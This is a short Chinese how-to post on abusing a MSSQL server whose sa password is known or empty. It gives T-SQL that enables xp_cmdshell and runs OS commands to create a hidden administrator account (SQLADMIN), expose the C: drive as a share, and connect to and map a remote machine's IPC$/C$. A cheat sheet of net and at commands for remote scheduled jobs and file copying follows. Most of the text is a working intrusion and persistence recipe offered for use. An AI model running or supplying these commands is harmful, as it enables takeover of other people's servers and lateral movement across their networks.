通过SQL添加WINDOWS管理员方法

首先前提是知道对方数据库sa用户的密码，有的人在自己的计算机安装数据的时候，喜欢将数据库密码为空，这样留下的后患就是人家通过连接你的数据库，通过下面指令，可以在你的计算机上添加超级管理员帐号：

-- 基于安全考虑,MSSQL2005及以上版本默认禁用了xp_cmdshell。直接调用该扩展存储过程会提示：

-- SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。

-- 系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息，请参阅 SQL Server 联机丛书中的 "外围应用配置器"。

-- 执行以下语句启用xp_cmdshell

-- 将开启语句的第二个1改成0再执行，xp_cmdshell就又处于禁用状态了

EXEC sp_configure 'show advanced options', 1;

RECONFIGURE;

go

EXEC sp_configure 'xp_cmdshell', 1;

RECONFIGURE;

go

--查看密码密码规则

exec xp_cmdshell 'net accounts'

-- 添加用户SQLADMIN

exec xp_cmdshell 'net user/users SQLADMIN /add'

-- 给SQLADMIN用户分配管理员权限

exec xp_cmdshell 'net localgroup administrators SQLADMIN /add'

-- 删除SQLADMIN用户的管理员权限

exec xp_cmdshell 'net localgroup administrators SQLADMIN /delete'

-- 删除SQLADMIN用户

exec xp_cmdshell 'net user/users SQLADMIN /delete'

-- net share 共享名=路径 设置共享

exec xp_cmdshell 'net share c$=c:'

-- net share 共享名 /delete 删除IPC$共享

exec xp_cmdshell 'net share c$ /delete'

-- 建立远程IPC$连接

net use \\192.168.0.70\IPC$ “********” /user:administrator

-- 映射远程机器共享资源

net use x: \\192.168.0.70\C$

*net user 查看用户列表

*net user 用户名 密码 /add 添加用户

*net user 用户名 密码 更改用户密码

*net localgroup administrators 用户名 /add 添加用户到管理组

*net user 用户名 /delete 删除用户

*net user 用户名 查看用户的基本情况

*net user 用户名 /active:no 禁用该用户

*net user 用户名 /active:yes 启用该用户

*net share 查看计算机IPC$共享资源

*net share 共享名 查看该共享的情况

*net share 共享名=路径 设置共享。例如 net share c$=c:

*net share 共享名 /delete 删除IPC$共享

*net use 查看IPC$连接情况

*net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

*net time \\ip 查看远程计算机上的时间

*copy 路径:\文件名 \\ip\共享名 复制文件到已经ipc$连接的计算机上

*net view ip 查看计算机上的共享资源

*ftp 服务器地址 进入FTP服务器

*at 查看自己计算机上的计划作业

*at \\ip 查看远程计算机上的计划作业

*at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

*at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

*at \\ip all /delete 删除远程计算机上的全部计划作业

exec xp_cmdshell 'net user SQLADMIN qaz!23#d%e /add'